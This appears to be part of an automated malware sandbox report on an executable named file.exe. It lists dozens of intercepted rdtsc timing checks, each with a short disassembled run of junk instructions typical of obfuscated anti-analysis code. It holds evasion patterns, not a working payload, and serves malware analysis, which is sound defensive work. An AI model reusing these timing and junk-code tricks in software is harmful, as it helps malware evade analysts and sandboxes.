                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 687025 second address: 68702B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A7C6 second address: 68A7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jmp 00007F99FCCDC7E3h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A7E2 second address: 68A7F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F99FD381EE6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A959 second address: 68A981 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F99FCCDC7E8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A981 second address: 68A996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EF1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692B21 second address: 692B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692B27 second address: 692B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692B2D second address: 692B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F99FCCDC7E8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692B4D second address: 692B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F99FD381EF4h 0x0000000b jmp 00007F99FD381EF2h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692B82 second address: 692B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 ja 00007F99FCCDC7D6h 0x0000000c jmp 00007F99FCCDC7DAh 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 690C59 second address: 690C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 690C5F second address: 690C9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F99FCCDC7E6h 0x0000000c pushad 0x0000000d jne 00007F99FCCDC7D6h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F99FCCDC7E9h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691116 second address: 691126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691126 second address: 691142 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99FCCDC7EEh 0x00000008 jmp 00007F99FCCDC7E2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6913F3 second address: 691414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F99FD381EE6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F99FD381EF1h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69157E second address: 691582 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691582 second address: 691588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691693 second address: 6916C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F99FCCDC7FDh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 691B1B second address: 691B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99FD381EF4h 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 692280 second address: 692287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A440 second address: 69A450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F99FD381EE6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A450 second address: 69A471 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F99FCCDC7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F99FCCDC7E3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A471 second address: 69A489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A180 second address: 69A189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A189 second address: 69A18D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69A18D second address: 69A193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BA80 second address: 69BA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BA84 second address: 69BA88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69BA88 second address: 69BA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AE1EB second address: 6AE20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F99FCCDC7D6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jnp 00007F99FCCDC7D6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jo 00007F99FCCDC7D6h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ADDEE second address: 6ADE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F99FD381EF5h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ADE0A second address: 6ADE18 instructions: 0x00000000 rdtsc 0x00000002 js 00007F99FCCDC7D8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2F2B second address: 5D2F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2F2F second address: 5D2F47 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F99FCCDC7DDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B3035 second address: 6B304B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jbe 00007F99FD381EE6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E23E8 second address: 5E23EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C31EB second address: 6C31F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C31F1 second address: 6C31F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CC535 second address: 6CC54C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CAF5B second address: 6CAF75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7E6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB36A second address: 6CB37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F99FD381EECh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB657 second address: 6CB66A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F99FCCDC7DAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB66A second address: 6CB670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB670 second address: 6CB676 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB7E0 second address: 6CB7EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB7EC second address: 6CB7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB7F0 second address: 6CB7F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2543 second address: 6D2547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2547 second address: 6D254D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D8BDB second address: 6D8BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F99FCCDC7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E0C66 second address: 6E0C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDE39 second address: 6EDE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99FCCDC7D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDE45 second address: 6EDE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDE4A second address: 6EDEBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F99FCCDC7D6h 0x00000009 jmp 00007F99FCCDC7E6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c pushad 0x0000001d jmp 00007F99FCCDC7DFh 0x00000022 jnc 00007F99FCCDC7D6h 0x00000028 jmp 00007F99FCCDC7E5h 0x0000002d popad 0x0000002e jmp 00007F99FCCDC7E8h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4E7A second address: 6F4EAD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F99FD381EF5h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jp 00007F99FD381F15h 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007F99FD381EE6h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F40F2 second address: 6F40F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4776 second address: 6F4780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4780 second address: 6F4795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F99FCCDC7D6h 0x0000000f jne 00007F99FCCDC7D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4795 second address: 6F479F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F99FD381EE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F479F second address: 6F47A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F490E second address: 6F491D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F99FD381EE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F491D second address: 6F4934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F99FCCDC7DEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4BBA second address: 6F4BDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF4h 0x00000007 jc 00007F99FD381EF2h 0x0000000d jc 00007F99FD381EE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAB8D second address: 6FAB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAB91 second address: 6FABA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007F99FD381EF4h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FCCD0 second address: 6FCCD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FCCD6 second address: 6FCCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007F99FD381EE6h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FCCE5 second address: 6FCCEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC872 second address: 6FC87C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F99FD381EE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC87C second address: 6FC88C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jne 00007F99FCCDC7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC88C second address: 6FC890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01C13 second address: 4A01C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01C17 second address: 4A01C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01C1D second address: 4A01C90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d movsx ebx, cx 0x00000010 popad 0x00000011 xchg eax, ecx 0x00000012 pushad 0x00000013 movzx esi, dx 0x00000016 jmp 00007F99FCCDC7E7h 0x0000001b popad 0x0000001c call dword ptr [7598188Ch] 0x00000022 mov edi, edi 0x00000024 push ebp 0x00000025 mov ebp, esp 0x00000027 push ecx 0x00000028 mov ecx, dword ptr [7FFE0004h] 0x0000002e mov dword ptr [ebp-04h], ecx 0x00000031 cmp ecx, 01000000h 0x00000037 jc 00007F99FCD0E2B5h 0x0000003d mov eax, 7FFE0320h 0x00000042 mov eax, dword ptr [eax] 0x00000044 mul ecx 0x00000046 shrd eax, edx, 00000018h 0x0000004a mov esp, ebp 0x0000004c pop ebp 0x0000004d ret 0x0000004e jmp 00007F99FCCDC7E6h 0x00000053 pop ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F99FCCDC7E7h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01C90 second address: 4A01AFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b xor esi, eax 0x0000000d lea eax, dword ptr [ebp-10h] 0x00000010 push eax 0x00000011 call 00007F9A0197A25Ah 0x00000016 mov edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ah, bh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01AFA second address: 4A01B37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99FCCDC7DEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F99FCCDC7DEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01B37 second address: 4A01BDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FD381EF1h 0x00000008 mov ax, E007h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov bh, ah 0x00000013 push edi 0x00000014 pushfd 0x00000015 jmp 00007F99FD381EF0h 0x0000001a jmp 00007F99FD381EF5h 0x0000001f popfd 0x00000020 pop esi 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F99FD381EF8h 0x0000002d sbb ax, 5878h 0x00000032 jmp 00007F99FD381EEBh 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F99FD381EF8h 0x0000003e sub cx, 72D8h 0x00000043 jmp 00007F99FD381EEBh 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0198F second address: 4A0199F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0199F second address: 4A019AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A019AE second address: 4A019C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A019C1 second address: 4A019FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F99FD381EECh 0x00000010 mov ch, C8h 0x00000012 pop edx 0x00000013 call 00007F99FD381EECh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B31 second address: 49A0B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 198C9ADDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B3B second address: 49A0B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007F99FD381EF6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99FD381EF7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B76 second address: 49A0B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0B7C second address: 49A0B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D06BD second address: 49D0730 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99FCCDC7DEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov edi, 3F629D84h 0x00000016 call 00007F99FCCDC7DDh 0x0000001b movzx eax, di 0x0000001e pop ebx 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F99FCCDC7E5h 0x0000002a sub eax, 1BA36626h 0x00000030 jmp 00007F99FCCDC7E1h 0x00000035 popfd 0x00000036 mov di, ax 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D0730 second address: 49D0799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F99FD381EEEh 0x00000012 push dword ptr [ebp+04h] 0x00000015 pushad 0x00000016 movzx eax, dx 0x00000019 pushfd 0x0000001a jmp 00007F99FD381EF3h 0x0000001f add esi, 205FEEBEh 0x00000025 jmp 00007F99FD381EF9h 0x0000002a popfd 0x0000002b popad 0x0000002c push dword ptr [ebp+0Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F99FD381EEDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D0799 second address: 49D079F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
